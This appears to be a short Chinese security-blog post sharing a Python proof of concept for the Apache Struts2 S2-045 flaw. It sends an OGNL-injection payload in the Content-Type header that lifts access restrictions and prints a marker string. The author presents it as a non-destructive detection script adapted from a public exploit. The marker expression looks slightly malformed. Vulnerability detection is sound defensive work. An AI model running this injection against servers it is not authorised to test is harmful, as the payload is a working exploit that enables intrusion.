s2-045 无损检测 PoC 分享

华盟原创文章投稿奖励计划
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。
附上无损检测POC:
#! /usr/bin/env python
#coding: utf-8
import requests
import sys
header = dict()
header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('test' 602 53718)).(#o.close())}"
s = requests.get(sys.argv[1], headers=header)
print s.content
本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/38214.html

发表评论